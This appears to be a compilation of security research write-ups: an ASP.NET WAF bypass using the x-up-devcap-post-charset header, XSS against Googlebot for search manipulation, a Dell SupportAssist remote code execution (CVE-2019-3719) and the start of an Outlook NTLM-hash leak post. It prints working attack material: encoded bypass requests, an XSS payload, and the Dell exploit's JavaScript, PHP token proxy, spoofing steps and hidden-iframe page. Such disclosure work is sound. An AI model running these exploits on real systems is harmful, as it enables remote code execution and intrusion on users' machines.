x-up-devcap-post-charset Header in ASP.NET to Bypass WAFs Again!

In the past, I showed how the request encoding technique can be abused to bypass web application firewalls (WAFs). The generic WAF solution to stop this technique has been implemented by only allowing whitelisted charsets via the Content-Type header or by blocking certain encoding charsets. Although WAF protection mechanisms can normally be bypassed by changing the headers slightly, I have also found a new header in ASP.NET that can hold the charset value and should bypass any existing protection mechanism based on the Content-Type header. Let me introduce to you, the one and only, the x-up-devcap-post-charset header, which can be used like this:

POST /test/a.aspx?%C8%85%93%93%96%E6%96%99%93%84= HTTP/1.1
Host: target
User-Agent: UP foobar
Content-Type: application/x-www-form-urlencoded
x-up-devcap-post-charset: ibm500
Content-Length: 40

%89%95%97%A4%A3%F1=%A7%A7%A7%A7%A7%A7%A7

As shown above, the Content-Type header does not carry a charset directive; the x-up-devcap-post-charset header holds the encoding's charset instead. In order to tell ASP.NET to use this new header, the User-Agent header should start with "UP". The parameters in the above request were created by the Burp Suite HTTP Smuggler, and the request is equivalent to:

POST /testme87/a.aspx?HelloWorld= HTTP/1.1
Host: target
User-Agent: UP foobar
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

input1=xxxxxxx

I found this header whilst I was looking for something else inside the ASP.NET Framework.
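The percent-encoded bytes in the first request are simply the IBM500 (EBCDIC) encoding of the plain request. A quick sketch using Python's built-in cp500 codec (which ibm500 aliases) shows the round trip:

```python
from urllib.parse import quote, unquote_to_bytes

def to_ibm500(text):
    # Percent-encode text as IBM500 (EBCDIC) bytes, the way HTTP Smuggler does
    return quote(text.encode('cp500'), safe='')

# The body parameter name of the encoded request
print(to_ibm500('input1'))  # %89%95%97%A4%A3%F1

# The query-string parameter of the encoded request, decoded back
print(unquote_to_bytes('%C8%85%93%93%96%E6%96%99%93%84').decode('cp500'))  # HelloWorld
```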
Here is how ASP.NET reads the content encoding before it looks at the charset directive in the Content-Type header (https://github.com/Microsoft/referencesource/blob/3b1eaf5203992df69de44c783a3eda37d3d4cd10/System/net/System/Net/HttpListenerRequest.cs#L362):

if (UserAgent!=null && CultureInfo.InvariantCulture.CompareInfo.IsPrefix(UserAgent, "UP")) {
    string postDataCharset = Headers["x-up-devcap-post-charset"];
    if (postDataCharset!=null && postDataCharset.Length>0) {
        try {
            return Encoding.GetEncoding(postDataCharset);

Or (https://github.com/Microsoft/referencesource/blob/08b84d13e81cfdbd769a557b368539aac6a9cb30/System.Web/HttpRequest.cs#L905):

if (UserAgent != null && CultureInfo.InvariantCulture.CompareInfo.IsPrefix(UserAgent, "UP")) {
    String postDataCharset = Headers["x-up-devcap-post-charset"];
    if (!String.IsNullOrEmpty(postDataCharset)) {
        try {
            return Encoding.GetEncoding(postDataCharset);

I should admit that the original technique still works on most of the WAFs out there, as they have not taken the request encoding bypass technique seriously. However, the OWASP ModSecurity Core Rule Set (CRS) quickly created a simple rule for it at the time, which they are going to improve in the future. Therefore, I disclosed this new header to Christian Folini (@ChrFolini) from CRS so that another useful rule could be created before releasing this blog post. The pull request for the new rule is pending at https://github.com/SpiderLabs/owasp-modsecurity-crs/pull/1392.
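Paraphrased in Python, the resolution order reads roughly as follows (an illustrative paraphrase of the referenced C# code, not Microsoft's actual implementation):

```python
import codecs

def resolve_post_encoding(headers, default='utf-8'):
    # The UP / x-up-devcap-post-charset branch runs BEFORE the
    # Content-Type charset directive is ever consulted
    if headers.get('User-Agent', '').startswith('UP'):
        charset = headers.get('x-up-devcap-post-charset', '')
        if charset:
            try:
                return codecs.lookup(charset).name
            except LookupError:
                pass
    # ... fall through to the Content-Type charset directive (omitted here)
    return default

print(resolve_post_encoding({'User-Agent': 'UP foobar',
                             'x-up-devcap-post-charset': 'ibm500'}))  # cp500
print(resolve_post_encoding({'User-Agent': 'Mozilla/5.0',
                             'x-up-devcap-post-charset': 'ibm500'}))  # utf-8
```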
References:
- https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/request-encoding-to-bypass-web-application-firewalls/
- https://www.slideshare.net/SoroushDalili/waf-bypass-techniques-using-http-standard-and-web-servers-behaviour
- https://soroush.secproject.com/blog/2018/08/waf-bypass-techniques-using-http-standard-and-web-servers-behaviour/
- https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/september/rare-aspnet-request-validation-bypass-using-request-encoding/
- https://github.com/nccgroup/BurpSuiteHTTPSmuggler/

This entry was posted in Security Articles and tagged ASP.NET, request encoding, waf, WAF bypass, x-up-devcap-post-charset on May 4, 2019.

Source: https://soroush.secproject.com/blog/2019/05/x-up-devcap-post-charset-header-in-aspnet-to-bypass-wafs-again/
-
XSS attacks on Googlebot allow search index manipulation

Short version: Googlebot is based on Google Chrome version 41 (2015), and therefore has no XSS Auditor, which later versions of Chrome use to protect the user from XSS attacks. Many sites are susceptible to XSS attacks, where the URL can be manipulated to inject unsanitized Javascript code into the site. Since Googlebot executes Javascript, this allows an attacker to craft XSS URLs that manipulate the content of victim sites. This manipulation can include injecting links, which Googlebot will follow to crawl the destination site. This presumably manipulates PageRank, but I've not tested that for fear of impacting real sites' rankings. I reported this to Google in November 2018, but after 5 months they had made no headway on the issue (citing internal communication difficulties), and therefore I'm publishing details so that site owners and companies can defend their own sites from this sort of attack. Google have now told me they do not have immediate plans to remedy this.

Last year I published details of an attack against Google's handling of XML Sitemaps, which allowed an attacker to 'borrow' PageRank from other sites and rank illegitimate sites for competitive terms in Google's search results. Following that, I had been investigating other potential attacks when my colleague at Distilled, Robin Lord, mentioned the concept of Javascript injection attacks, which got me thinking.

XSS Attacks

There are various types of cross-site scripting (XSS) attack; we are interested in the situation where Javascript code inside the URL is included in the content of the page without being sanitized. This can result in the Javascript code being executed in the user's browser (even though the code isn't intended to be part of the site).
For example, imagine a snippet of PHP code designed to show the value of the page URL parameter (the snippet appears as an image in the original post). If someone was to craft a malicious URL where, instead of a number in the page parameter, they put a snippet of Javascript:

https://foo.com/stores/?page=<script>alert('hello')</script>

Then it may produce HTML with inline Javascript which the page authors had never intended to be there. That malicious Javascript could do all sorts of evil things, such as steal data from the victim page, or trick the user into thinking the content they are looking at is authentic. The user may be visiting a trusted domain, and therefore trust the contents of the page, which are being manipulated by a hacker.

Chrome to the rescue

It is for that reason that Google Chrome has an XSS Auditor, which attempts to identify this type of attack and protect the user (by refusing to load the page). So far, so good.

Googlebot = Chrome 41

Googlebot is currently based on Chrome version 41, which we know from Google's own documentation. We also know that for the last couple of years Google have been promoting the fact that Googlebot executes and indexes Javascript on the sites it crawls. Chrome 41 had no XSS Auditor (that I'm aware of; it certainly doesn't block any XSS that I've tried), and therefore my theory was that Googlebot likely has no XSS Auditor either. So the first step was to check whether Googlebot (or Google's Web Rendering Service [WRS], to be more precise) would actually render a URL with an XSS attack. One of my early tests was on the startup bank, Revolut: a 3-year-old fintech startup with $330M in funding having XSS vulnerabilities demonstrates the breadth of the XSS issue (they've now fixed this example).
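The class of bug described above is language-agnostic; here is a hypothetical Python equivalent (not the original post's PHP code) of a template that reflects the page parameter without escaping:

```python
def render_page_number(page):
    # Hypothetical vulnerable template: the parameter is interpolated
    # into the HTML response with no sanitization or escaping
    return "<p>You are viewing page %s</p>" % page

# Normal use
print(render_page_number("2"))
# A crafted value from ?page=... becomes live markup in the response
print(render_page_number("<script>alert('hello')</script>"))
```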
I used Google's Mobile Friendly Tool to render the page, which quickly confirmed that Google's WRS executes the XSS Javascript; in this case I'm crudely injecting a link at the top of the page. It is often (as in the case with Revolut) possible to entirely replace the content of the page to create your own page and content, hosted on the victim domain.

Content + links are cached

I submitted a test page to the Google index, and examining the cache of these pages showed that the link being added to the page does appear in the Google index.

Canonicals

A second set of experiments demonstrated (again via the mobile friendly tool) that you can change the canonicals on pages, which I also confirmed via Google's URL Inspection Tool; it reports the injected canonical as the true canonical (h/t to Sam Nemzer for the suggestion).

Links are crawled and considered

At this point, I had confirmed that Google's WRS is susceptible to XSS attacks, and that Google were crawling the pages, executing the Javascript, indexing the content and considering the search directives within (i.e. the canonicals). The next important question is whether Google finds links on these pages and crawls them. Placing links on other sites is the backbone of the PageRank algorithm and a key factor in how sites rank in Google's algorithm. To test this, I crafted a page on Revolut which contained a link to a page on one of my test domains, which I had created moments before and which had previously not existed. I submitted the Revolut page to Google, and later on Googlebot crawled the target page on my test domain. The page later appeared in the Google search results. This demonstrated that Google was identifying and crawling injected links. Furthermore, Google confirms that Javascript links are treated identically to HTML links (thanks Joel Mesherghi). All of this demonstrates that there is potential to manipulate the Google search results.
However, I was unsure how to test this without actually impacting legitimate search results, so I stopped where I was (I asked Google for permission to do this in a controlled fashion a few days back, but have not had an answer just yet).

How could this be abused?

The obvious attack vector here is to inject links into other websites to manipulate the search results: a few links from prominent sites can make a very dramatic difference to search performance. The https://www.openbugbounty.org/ site lists more than 125,000 un-patched XSS vulnerabilities. This includes 260 .gov domains, 971 .edu domains, and 195 of the top 500 domains (as ranked by the Majestic Million list of the top million sites). A second attack vector is to create malicious pages (maybe redirecting people to a malicious checkout, or directing visitors to a competing product) which would be crawled and indexed by Google. This content could even drive featured snippets and appear directly in the search results. Firefox doesn't yet have adequate XSS protection, so these pages would load for Google users searching with Firefox.

Defence

The most obvious way to defend against this is to take security seriously and try to ensure you don't have XSS vulnerabilities on your site. However, given the numbers from OpenBugBounty above, it is clear that that is more difficult than it sounds, which is the exact reason that Google added the XSS Auditor to Chrome! One quick thing you can do is check your server logs and search for URLs that have terms such as 'script' in them, indicating a possible XSS attempt.

Wrap up

This exploit is a combination of existing issues, which together form a zero-day exploit that has the potential to be very harmful for Google users. I reported the issue to Google back in November 2018, but they have not confirmed the issue from their side or made any headway addressing it.
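The log-checking suggestion in the Defence section above can be sketched as a tiny filter; the patterns and the sample log lines are illustrative assumptions, not part of the original post:

```python
import re

# Crude indicators of reflected-XSS probing in request URLs
SUSPICIOUS = re.compile(r"(<script|%3Cscript|javascript:|onerror=)", re.IGNORECASE)

def suspicious_requests(log_lines):
    # Return any access-log line whose URL portion looks like an XSS attempt
    return [line for line in log_lines if SUSPICIOUS.search(line)]

sample = [
    'GET /stores/?page=2 HTTP/1.1',
    'GET /stores/?page=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1',
]
print(suspicious_requests(sample))
```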
They cited "difficulties in communication with the team investigating", which felt a lot like what happened during the report of the XML Sitemaps exploit. My impression is that if a security issue affects a part of Google that is not commonly affected, then the internal lines of communication are not well oiled. It was March when I got the first details, when Google let me know "that our existing protection mechanisms should be able to prevent this type of abuse but the team is still running checks to validate this", which didn't agree with the evidence. I re-ran some of my tests and didn't see a difference. The security team themselves were very responsive, as usual, but seemingly had no way to move things forward, unfortunately. It was 140 days after the report when I let Google know I'd be publicly disclosing the vulnerability, given the lack of movement and the fact that this could already be impacting Google search users as well as website owners and advertisers. To their credit, Google didn't attempt to dissuade me and simply asked me to use my best judgement in what I publish. If you have any questions, comments or information you can find me on Twitter at @TomAnthonySEO, or if you are interested in consulting for technical/specialised SEO, you can contact me via Distilled.

Disclosure Timeline

3rd November 2018 - I filed the initial bug report. Over the next few weeks/months we went back and forth a bit.
11th February 2019 - Google responded letting me know they were "surfacing some difficulties in communication with the team investigating".
17th April 2019 - Google confirmed they have no immediate plans to fix this. I believe this is probably because they are preparing to release a new build of Googlebot shortly (I wonder if this was why the back and forth was slow: they were hoping to release the update?).

Source: http://www.tomanthony.co.uk/blog/xss-attacks-googlebot-index-manipulation/
-
This talk gives an in-depth look at how different encoding schemes can lead to implementation flaws or even security vulnerabilities across different areas of the IT world. Check out Christopher's slides here: http://dreher.in/pub/unicode/#/ Have a question? Ask it on our forum: http://bgcd.co/2uq2Aql Join Bugcrowd today: http://bgcd.co/2up2fUH
-
Remote Code Execution on most Dell computers

What computer do you use? Who made it? Have you ever thought about what came with your computer? When we think of Remote Code Execution (RCE) vulnerabilities en masse, we might think of vulnerabilities in the operating system, but another attack vector to consider is "What third-party software came with my PC?". In this article, I'll be looking at a Remote Code Execution vulnerability I found in Dell SupportAssist, software meant to "proactively check the health of your system's hardware and software" and which is "preinstalled on most of all new Dell devices".

Discovery

Back in September, I was in the market for a new laptop because my 7-year-old MacBook Pro just wasn't cutting it anymore. I was looking for an affordable laptop that had the performance I needed, and I decided on Dell's G3 15 laptop. I decided to upgrade my laptop's 1 terabyte hard drive to an SSD. After upgrading and re-installing Windows, I had to install drivers. This is when things got interesting. After visiting Dell's support site, I was prompted with an interesting option: "Detect PC". How would it be able to detect my PC? Out of curiosity, I clicked on it to see what happened: a program which automatically installs drivers for me. Although it was a convenient feature, it seemed risky. The agent wasn't installed on my computer because it was a fresh Windows installation, but I decided to install it to investigate further. It was very suspicious that Dell claimed to be able to update my drivers through a website. Installing it was a painless process, just a click on the install button. In the shadows, the SupportAssist installer created the SupportAssistAgent and Dell Hardware Support services. These services corresponded to .NET binaries, making it easy to reverse engineer what they did. After installing, I went back to the Dell website and decided to check what it could find.
I opened the Chrome Web Inspector and the Network tab, then pressed the "Detect Drivers" button. The website made requests to port 8884 on my local computer. Checking that port out in Process Hacker showed that the SupportAssistAgent service had a web server on that port. Dell was exposing a REST API of sorts in its service, allowing the Dell website to issue various requests. The web server replied with a strict Access-Control-Allow-Origin header of https://www.dell.com to prevent other websites from making requests. On the web browser side, the client was providing a signature to authenticate various commands. These signatures are generated by making a request to https://www.dell.com/support/home/us/en/04/drivers/driversbyscan/getdsdtoken, which also provides when the signature expires. After pressing "download drivers" on the web side, this request was of particular interest:

POST http://127.0.0.1:8884/downloadservice/downloadmanualinstall?expires=expiretime&signature=signature
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/json
Origin: https://www.dell.com
Referer: https://www.dell.com/support/home/us/en/19/product-support/servicetag/xxxxx/drivers?showresult=true&files=1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

The body:

[
  {
    "title": "Dell G3 3579 and 3779 System BIOS",
    "category": "BIOS",
    "name": "G3_3579_1.9.0.exe",
    "location": "https://downloads.dell.com/FOLDER05519523M/1/G3_3579_1.9.0.exe?uid=29b17007-bead-4ab2-859e-29b6f1327ea1&fn=G3_3579_1.9.0.exe",
    "isSecure": false,
    "fileUniqueId": "acd94f47-7614-44de-baca-9ab6af08cf66",
    "run": false,
    "restricted": false,
    "fileId": "198393521",
    "fileSize": "13 MB",
    "checkedStatus": false,
    "fileStatus": -99,
    "driverId": "4WW45",
    "path": "",
    "dupInstallReturnCode": "",
    "cssClass": "inactive-step",
    "isReboot": true,
    "DiableInstallNow": true,
    "$$hashKey": "object:175"
  }
]

It seemed like
the web client could make direct requests to the SupportAssistAgent service to "download and manually install" a program. I decided to find the web server in the SupportAssistAgent service to investigate what commands could be issued. On start, Dell SupportAssist starts a web server (System.Net.HttpListener) on port 8884, 8883, 8886, or 8885; it uses whichever one is available, starting with 8884. On a request, the ListenerCallback located in HttpListenerServiceFacade calls ClientServiceHandler.ProcessRequest. ClientServiceHandler.ProcessRequest, the base web server function, starts by doing integrity checks, for example making sure the request came from the local machine, along with various other checks. Later in this article, we'll get into some of the issues in the integrity checks, but for now most are not important to achieving RCE. An important integrity check for us is in ClientServiceHandler.ProcessRequest, specifically the point at which the server checks that the referrer is from Dell.
ProcessRequest calls the following function to ensure that the request comes from Dell:

public static bool ValidateDomain(Uri request, Uri urlReferrer)
{
    return SecurityHelper.ValidateDomain(urlReferrer.Host.ToLower())
        && (request.Host.ToLower().StartsWith("127.0.0.1") || request.Host.ToLower().StartsWith("localhost"))
        && request.Scheme.ToLower().StartsWith("http")
        && urlReferrer.Scheme.ToLower().StartsWith("http");
}

public static bool ValidateDomain(string domain)
{
    return domain.EndsWith(".dell.com") || domain.EndsWith(".dell.ca")
        || domain.EndsWith(".dell.com.mx") || domain.EndsWith(".dell.com.br")
        || domain.EndsWith(".dell.com.pr") || domain.EndsWith(".dell.com.ar")
        || domain.EndsWith(".supportassist.com");
}

The issue with the function above is that it really isn't a solid check, and it gives an attacker a lot to work with. To bypass the Referer/Origin check, we have a few options:

1. Find a Cross-Site Scripting vulnerability in any of Dell's websites (I would only have to find one on the sites designated for SupportAssist).
2. Find a Subdomain Takeover vulnerability.
3. Make the request from a local program.
4. Generate a random subdomain name and use an external machine to DNS hijack the victim. Then, when the victim requests [random].dell.com, we respond with our server.

In the end, I decided to go with option 4, and I'll explain why in a later bit. After verifying the Referer/Origin of the request, ProcessRequest sends the request to corresponding functions for GET, POST, and OPTIONS. When I was learning more about how Dell SupportAssist works, I intercepted different types of requests from Dell's support site. Luckily, my laptop had some pending updates, and I was able to intercept requests through my browser's console.
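The weakness is easiest to see by re-implementing the check; in this Python paraphrase of SecurityHelper.ValidateDomain(string), any host under an allowed suffix passes, which is what makes option 4 (a DNS-hijacked throwaway subdomain) viable:

```python
def validate_domain(referrer_host):
    # Python paraphrase of the C# ValidateDomain(string) check above
    allowed_suffixes = ('.dell.com', '.dell.ca', '.dell.com.mx', '.dell.com.br',
                        '.dell.com.pr', '.dell.com.ar', '.supportassist.com')
    return referrer_host.lower().endswith(allowed_suffixes)

print(validate_domain('www.dell.com'))             # True - legitimate
print(validate_domain('anything-at-all.dell.com')) # True - attacker-chosen subdomain
print(validate_domain('dell.com.evil.net'))        # False
```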
First, the website tries to detect SupportAssist by looping through the aforementioned service ports and connecting to the service method "isalive". What was interesting was that it was passing a "Signature" parameter and an "Expires" parameter. To find out more, I reversed the Javascript side of the browser. Here's what I found out:

First, the browser makes a request to https://www.dell.com/support/home/us/en/04/drivers/driversbyscan/getdsdtoken and gets the latest "Token", i.e. the signatures I was talking about earlier. The endpoint also provides the "Expires" token. This solves the signature problem. Next, the browser makes a request to each service port with a URL like this: http://127.0.0.1:[SERVICE PORT]/clientservice/isalive/?expires=[EXPIRES]&signature=[SIGNATURE]. When the right service port is reached, the SupportAssist client responds like this:

{
  "isAlive": true,
  "clientVersion": "[CLIENT VERSION]",
  "requiredVersion": null,
  "success": true,
  "data": null,
  "localTime": [EPOCH TIME],
  "Exception": {
    "Code": null,
    "Message": null,
    "Type": null
  }
}

Once the browser sees this, it continues with further requests using the now-determined service port. One concerning factor I noticed while looking at the different types of requests I could make is that I could get a very detailed description of every piece of hardware connected to my computer using the "getsysteminfo" route. Even through Cross-Site Scripting, I was able to access this data, which is an issue because I could seriously fingerprint a system and find sensitive information. Here are the methods the agent exposes:

clientservice_getdevicedrivers - Grabs available updates.
diagnosticsservice_executetip - Takes a tip guid and provides it to the PC Doctor service (Dell Hardware Support).
downloadservice_downloadfiles - Downloads a JSON array of files.
clientservice_isalive - Used as a heartbeat and returns basic information about the agent.
clientservice_getservicetag - Grabs the service tag.
localclient_img - Connects to SignalR (Dell Hardware Support).
diagnosticsservice_getsysteminfowithappcrashinfo - Grabs system information with crash dump information.
clientservice_getclientsysteminfo - Grabs information about devices on the system and, optionally, system health information.
diagnosticsservice_startdiagnosisflow - Used to diagnose issues on the system.
downloadservice_downloadmanualinstall - Downloads a list of files but does not execute them.
diagnosticsservice_getalertsandnotifications - Gets any alerts and notifications that are pending.
diagnosticsservice_launchtool - Launches a diagnostic tool.
diagnosticsservice_executesoftwarefixes - Runs remediation UI and executes a certain action.
downloadservice_createiso - Downloads an ISO.
clientservice_checkadminrights - Checks if the agent is privileged.
diagnosticsservice_performinstallation - Updates SupportAssist.
diagnosticsservice_rebootsystem - Reboots the system.
clientservice_getdevices - Grabs system devices.
downloadservice_dlmcommand - Checks on the status of, or cancels, an ongoing download.
diagnosticsservice_getsysteminfo - Calls GetSystemInfo on PC Doctor (Dell Hardware Support).
downloadservice_installmanual - Installs a file previously downloaded using downloadservice_downloadmanualinstall.
downloadservice_createbootableiso - Downloads a bootable ISO.
diagnosticsservice_isalive - Heartbeat check.
downloadservice_downloadandautoinstall - Downloads a list of files and executes them.
clientservice_getscanresults - Gets driver scan results.
downloadservice_restartsystem - Restarts the system.

The one that caught my interest was downloadservice_downloadandautoinstall. This method downloads a file from a specified URL and then runs it. It is invoked by the browser when the user needs to install certain drivers that have to be installed automatically.
After finding which drivers need updating, the browser makes a POST request to http://127.0.0.1:[SERVICE PORT]/downloadservice/downloadandautoinstall?expires=[EXPIRES]&signature=[SIGNATURE] with the following JSON structure:

[
  {
    "title": "DOWNLOAD TITLE",
    "category": "CATEGORY",
    "name": "FILENAME",
    "location": "FILE URL",
    "isSecure": false,
    "fileUniqueId": "RANDOMUUID",
    "run": true,
    "installOrder": 2,
    "restricted": false,
    "fileStatus": -99,
    "driverId": "DRIVER ID",
    "dupInstallReturnCode": 0,
    "cssClass": "inactive-step",
    "isReboot": false,
    "scanPNPId": "PNP ID",
    "$$hashKey": "object:210"
  }
]

After doing the basic integrity checks we discussed before, ClientServiceHandler.ProcessRequest sends the service method and the parameters we passed to ClientServiceHandler.HandlePost. ClientServiceHandler.HandlePost first puts all parameters into an array, then calls ServiceMethodHelper.CallServiceMethod. ServiceMethodHelper.CallServiceMethod acts as a dispatch function, calling the function registered for the given service method; for us, this is the "downloadandautoinstall" method:

if (service_Method == "downloadservice_downloadandautoinstall")
{
    string files5 = (arguments != null && arguments.Length != 0 && arguments[0] != null) ? arguments[0].ToString() : string.Empty;
    result = DownloadServiceLogic.DownloadAndAutoInstall(files5, false);
}

This calls DownloadServiceLogic.DownloadAndAutoInstall with the files we sent in the JSON payload. DownloadServiceLogic.DownloadAndAutoInstall acts as a wrapper (i.e. handling exceptions) for DownloadServiceLogic._HandleJson.
DownloadServiceLogic._HandleJson deserializes the JSON payload containing the list of files to download, and does the following integrity checks:

foreach (File file in list)
{
    bool flag2 = file.Location.ToLower().StartsWith("http://");
    if (flag2)
    {
        file.Location = file.Location.Replace("http://", "https://");
    }
    bool flag3 = file != null && !string.IsNullOrEmpty(file.Location) && !SecurityHelper.CheckDomain(file.Location);
    if (flag3)
    {
        DSDLogger.Instance.Error(DownloadServiceLogic.Logger, "InvalidFileException being thrown in _HandleJson method");
        throw new InvalidFileException();
    }
}
DownloadHandler.Instance.RegisterDownloadRequest(CreateIso, Bootable, Install, ManualInstall, list);

The above code loops through every file, checks whether the file URL we provided starts with http:// (and if it does, replaces it with https://), and checks whether the URL's host matches a list of Dell's download servers (note: not all subdomains):

public static bool CheckDomain(string fileLocation)
{
    List<string> list = new List<string>
    {
        "ftp.dell.com",
        "downloads.dell.com",
        "ausgesd4f1.aus.amer.dell.com"
    };
    return list.Contains(new Uri(fileLocation.ToLower()).Host);
}

Finally, if all these checks pass, the files get sent to DownloadHandler.RegisterDownloadRequest, at which point SupportAssist downloads and runs the files as Administrator. This is enough information to start writing an exploit.

Exploitation

The first issue we face is making requests to the SupportAssist client. Assume we are in the context of a Dell subdomain; we'll get into how exactly we achieve this later in this section. I decided to mimic the browser and make requests using Javascript. First things first, we need to find the service port. We can do this by polling through the predefined service ports and making a request to "/clientservice/isalive". The issue is that we also need to provide a signature.
To get the signature that we pass to isalive, we can make a request to https://www.dell.com/support/home/us/en/04/drivers/driversbyscan/getdsdtoken. This isn't as straightforward as it might seem: the "Access-Control-Allow-Origin" of the signature URL is set to "https://www.dell.com". This is a problem, because we're in the context of a subdomain, probably not over https. How do we get past this barrier? We make the request from our own server! The signatures that are returned from "getdsdtoken" are applicable to all machines, not unique per machine. I made a small PHP script that grabs the signatures:

<?php
header('Access-Control-Allow-Origin: *');
echo file_get_contents('https://www.dell.com/support/home/us/en/04/drivers/driversbyscan/getdsdtoken');
?>

The header call allows anyone to make a request to this PHP file, and we just echo the signatures, acting as a proxy to the "getdsdtoken" route. The "getdsdtoken" route returns JSON with signatures and an expire time, so we can just use JSON.parse on the result to place the signatures into a Javascript object. Now that we have the signature and expire time, we can start making requests. I made a small function that loops through each service port; when we reach a live one, we set the (global) server_port variable to the port that responded:

function FindServer() {
    ports.forEach(function(port) {
        var is_alive_url = "http://127.0.0.1:" + port + "/clientservice/isalive/?expires=" + signatures.Expires + "&signature=" + signatures.IsaliveToken;
        var response = SendAsyncRequest(is_alive_url, function() { server_port = port; });
    });
}

After we have found the server, we can send our payload. This was the hardest part; there are some serious obstacles before "downloadandautoinstall" executes our payload. Starting with the hardest issue: the SupportAssist client has a hard whitelist on file locations. Specifically, the host must be either "ftp.dell.com", "downloads.dell.com", or "ausgesd4f1.aus.amer.dell.com".
I almost gave up at this point, because I couldn’t find an open redirect vulnerability on any of the sites. Then it hit me, we can do a man-in-the-middle attack. If we could provide the SupportAssist client with a http:// URL, we could easily intercept and change the response! This somewhat solves the hardest challenge. The second obstacle was designed specifically to counter my solution to the first obstacle. If we look back to the steps I outlined, if the file URL starts with http://, it will be replaced by https://. This is an issue, because we can’t really intercept and change the contents of a proper https connection. The key bypass to this mitigation was in this sentence: “if the URL starts with http://, it will be replaced by https://”. See, the thing was, if the URL string did not start with http://, even if there was http:// somewhere else in the string, it wouldn’t replace it. Getting a URL to work was tricky, but I eventually came up with “ http://downloads.dell.com/abcdefg” (the space is intentional). When you ran the string through the starts with check, it would return false, because the string starts with “ “, thus leaving the “http://” alone. 
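The leading-space bypass is easy to demonstrate; this Python sketch mirrors the flawed http-to-https rewrite described above:

```python
def rewrite_location(location):
    # Mirrors the flawed check: the rewrite only fires when the
    # string STARTS WITH "http://", so a leading space defeats it
    if location.lower().startswith('http://'):
        location = location.replace('http://', 'https://')
    return location

print(rewrite_location('http://downloads.dell.com/x'))   # upgraded to https://
print(rewrite_location(' http://downloads.dell.com/x'))  # leading space: http:// survives
```

Meanwhile, .NET's Uri constructor trims leading whitespace when parsing the URL, so the host of the space-prefixed string still matches the downloads.dell.com whitelist in CheckDomain.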
I made a function that automated sending the payload:

function SendRCEPayload() {
    var auto_install_url = "http://127.0.0.1:" + server_port + "/downloadservice/downloadandautoinstall?expires=" + signatures.Expires + "&signature=" + signatures.DownloadAndAutoInstallToken;
    var xmlhttp = new XMLHttpRequest();
    xmlhttp.open("POST", auto_install_url, true);

    var files = [];
    files.push({
        "title": "SupportAssist RCE",
        "category": "Serial ATA",
        "name": "calc.EXE",
        "location": " http://downloads.dell.com/calc.EXE", // those spaces are KEY
        "isSecure": false,
        "fileUniqueId": guid(),
        "run": true,
        "installOrder": 2,
        "restricted": false,
        "fileStatus": -99,
        "driverId": "FXGNY",
        "dupInstallReturnCode": 0,
        "cssClass": "inactive-step",
        "isReboot": false,
        "scanPNPId": "PCI\\VEN_8086&DEV_282A&SUBSYS_08851028&REV_10",
        "$$hashKey": "object:210"
    });
    xmlhttp.send(JSON.stringify(files));
}

Next up was the attack from the local network. Here are the steps I take in the external portion of my proof of concept (attacker's machine):

1. Grab the interface IP address for the specified interface.
2. Start the mock web server and provide it with the filename of the payload we want to send. The web server checks if the Host header is downloads.dell.com and, if so, sends the binary payload. If the request Host has dell.com in it and is not the downloads domain, it sends the Javascript payload we mentioned earlier.
3. To ARP spoof the victim, we first enable IP forwarding, then send an ARP packet to the victim telling it that we're the router and an ARP packet to the router telling it that we're the victim machine. We repeat these packets every few seconds for the duration of our exploit. On exit, we send the original MAC addresses to the victim and router.
4. Finally, we DNS spoof by using iptables to redirect DNS packets to a netfilter queue. We listen to this netfilter queue and check if the requested DNS name is our target URL.
If so, we send a fake DNS packet back indicating that our machine is the true IP address behind that URL. When the victim visits our subdomain (either directly via URL or indirectly by an iframe), we send it the malicious javascript payload which finds the service port for the agent, grabs the signature from the php file we created earlier, then sends the RCE payload. When the RCE payload is processed by the agent, it will make a request to downloads.dell.com, which is when we return the binary payload.

You can read Dell's advisory here.

Demo

Here's a small demo video showcasing the vulnerability. You can download the source code of the proof of concept here. The source code of the dellrce.html file featured in the video is:

<h1>CVE-2019-3719</h1>
<h1>Nothing suspicious here... move along...</h1>
<iframe src="http://www.dellrce.dell.com" style="width: 0; height: 0; border: 0; border: none; position: absolute;"></iframe>

Timeline

10/26/2018 - Initial write-up sent to Dell.
10/29/2018 - Initial response from Dell.
11/22/2018 - Dell has confirmed the vulnerability.
11/29/2018 - Dell scheduled a "tentative" fix to be released in Q1 2019.
01/28/2019 - Disclosure date extended to March.
03/13/2019 - Dell is still fixing the vulnerability and has scheduled disclosure for the end of April.
04/18/2019 - Vulnerability disclosed as an advisory.

Written on April 30, 2019

Sursa: https://d4stiny.github.io/Remote-Code-Execution-on-most-Dell-computers/
-
Love letters from the red team: from e-mail to NTLM hashes with Microsoft Outlook

ntlm, security, red team — 03 July 2018

Introduction

A few months ago Will Dormann of CERT/CC published a blog post [1] describing a technique where an adversary could abuse Microsoft Outlook together with OLE objects, a feature of Microsoft Windows since its early days, to force the operating system to leak Net-NTLM hashes. Last year we wrote a blog post [2] that approached the subject of NTLM hash leakage from a different angle, by abusing common web application vulnerabilities such as Cross-Site Scripting (XSS) and Server-Side Request Forgery (SSRF) to achieve the same goals and obtain the precious hashes we all love and cherish. We recommend reading that post before continuing, unless you are familiar with how Windows single sign-on authentication works in corporate networks.

Here at Blaze Information Security we have been using for a while, with a high success rate, a similar technique to force MS Outlook to give out NTLM hashes with little to no interaction other than reading a specially-crafted e-mail message. Just recently, while we were writing this blog post, NCC Group published [5] in their blog an article describing the same technique we have been using, along with other details, so we decided to publish ours explaining the approach we use and how to mitigate the risk presented by this issue.

A brief history of SMB-to-NTLM hash attacks

In a post to the Bugtraq mailing list in March 1997 (yes, 21 years ago) Aaron Spangler wrote about a vulnerability [3] in versions of Internet Explorer and Netscape Navigator that worked by embedding an <img> tag with the 'src' value of an SMB share instead of an HTTP or HTTPS page. This would force Windows to initiate an NTLM authentication with a modified SMB server that could fetch the user's Net-NTLM hashes.
Interestingly, Aaron's Bugtraq post also hinted at a theoretical flaw in the authentication protocol, in what would later become known as SMB relay attacks, though these emerged only a few years later. Fast forward to 2016: a Russian security researcher named ValdikSS wrote [6] on Medium what seems to have been a modern replica of the same experiment Spangler did 19 years ago, with little to no modification from the original attack vector.

